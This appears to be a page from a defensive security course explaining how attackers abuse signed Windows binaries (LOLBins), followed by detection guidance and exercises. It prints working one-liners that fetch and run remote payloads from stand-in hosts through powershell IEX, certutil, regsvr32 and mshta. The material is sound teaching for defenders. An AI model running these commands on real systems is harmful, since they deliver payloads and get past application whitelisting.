Sign in to track your watch progress.
Why attackers use legitimate Windows binaries instead of dropping their own. The LOLBin catalogue, three abuse categories with examples, and detection guidance.
Ten years ago, malware analysts spent most of their time on custom executables that the attacker had compiled and dropped on disk. Today, sophisticated operators avoid dropping anything. Instead, they use legitimate, signed Windows binaries already present on every machine — abusing them to download payloads, execute code, and bypass security controls. Security tools struggle to block these binaries because doing so would break legitimate administrative functions.
This is Living off the Land (LotL), and the abused binaries are LOLBins.
A typical endpoint protection product maintains policies like "alert if powershell.exe invokes a network connection" — but powershell.exe is signed by Microsoft, used by sysadmins daily, and runs ordinary management tasks constantly. Alerts on every PowerShell invocation drown the SOC in noise. The defender's choice is to either accept the noise or write narrower rules — narrower rules attackers can side-step.
The asymmetry is the attacker's friend. They need one technique that survives every signature update. The defender needs to spot one signal in a million benign events.
| Binary | Abuse |
|---|---|
powershell.exe | Execute encoded commands, download payloads (Invoke-WebRequest), run scripts in memory without touching disk |
wmic.exe | Execute commands on remote machines, create processes, query system information; abused for lateral movement |
mshta.exe | Execute VBScript or JavaScript embedded in .hta files; bypasses application whitelisting |
msiexec.exe | Download and execute malicious .msi packages from a URL |
certutil.exe | Download files (-urlcache -split -f), decode Base64 payloads (-decode); originally a certificate management tool |
rundll32.exe | Execute arbitrary DLL exports; can also run JavaScript |
regsvr32.exe | Register COM objects from remote .sct scriptlets, bypassing AppLocker |
wscript.exe, cscript.exe | Execute VBScript / JScript files; common for phishing-borne payloads |
bitsadmin.exe | Background Intelligent Transfer Service; download files silently |
Each binary is signed, present in C:\Windows\System32, and indispensable to the OS.
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
-Command "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"
This downloads and executes a script entirely in memory. No file touches disk. Breakdown:
-NoProfile — skip the profile script (faster, fewer logs).-ExecutionPolicy Bypass — ignore signing requirements.-WindowStyle Hidden — no visible console window.IEX — Invoke-Expression, executes the downloaded string as PowerShell code.Net.WebClient.DownloadString reads the URL into memory; IEX interprets the result. The malicious code never has a filename or a hash on the victim's filesystem. EDRs that focus on file-on-disk indicators see nothing.
certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe
certutil.exe -decode encoded.txt payload.exe
certutil was designed for certificate management. It can also download arbitrary files (-urlcache -split -f) and decode Base64 (-decode). Both are essential for legitimate certificate workflows; both also serve attackers perfectly.
A SOC seeing certutil.exe make an outbound HTTP connection to an unfamiliar host should treat it as malicious until proven otherwise. Legitimate certutil usage almost never involves arbitrary URLs.
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll
Executes a remote scriptlet (.sct) containing VBScript or JScript. The flags:
/s — silent mode (no dialog boxes)./n — do not call DllRegisterServer./u — unregister mode (triggers the DllUnregisterServer path)./i:URL — passes the URL to the scriptlet handler.scrobj.dll — the Windows Script Component runtime.This technique bypasses AppLocker's default policy because regsvr32.exe is a Microsoft-signed system binary that AppLocker permits by default.
Pure signature-based detection cannot stop LotL. The defender's only effective tools are behavioural:
powershell -enc <base64>, certutil -decode, mshta http: are highly suspicious.winword.exe spawning powershell.exe is unusual. outlook.exe spawning mshta.exe is unusual. Map normal parent-child relationships and alert on deviations.certutil.exe making outbound HTTP, or regsvr32.exe resolving DNS for an external host — neither is normal.-EncodedCommand flag with high-entropy Base64 payloads, especially long ones, is rarely benign.Sysinternals Sysmon with a tuned config (Olaf Hartong's modular sysmon-config is the de facto standard) catches most of this with one log source.
Section 03
Comprehensive, community-maintained catalogue of every documented LOLBin with abuse patterns and detection guidance.
referenceMicrosoft's detailed system monitoring driver. Indispensable for LotL detection.
toolProduction-grade modular Sysmon configuration covering MITRE ATT&CK techniques.
toolATT&CK technique T1218 — System Binary Proxy Execution. Sub-techniques cover individual LOLBins.
mitreSection 04
For each of these command lines, name the LOLBin abuse category (fileless / download / AppLocker bypass): (1) mshta http://evil/x.hta, (2) bitsadmin /transfer /download, (3) powershell -EncodedCommand <b64>.
Install Sysmon with sysmon-modular. Run a test PowerShell -EncodedCommand. Find the matching event in Event Viewer. Verify the encoded command was logged.
Write a Sigma rule that detects certutil.exe making outbound HTTP connections. Test it against benign certutil usage to verify it doesn't false-positive.